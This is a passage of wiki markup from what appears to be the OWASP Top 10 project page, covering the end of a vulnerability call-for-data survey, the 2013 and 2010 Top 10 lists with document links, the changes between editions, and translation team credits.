* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
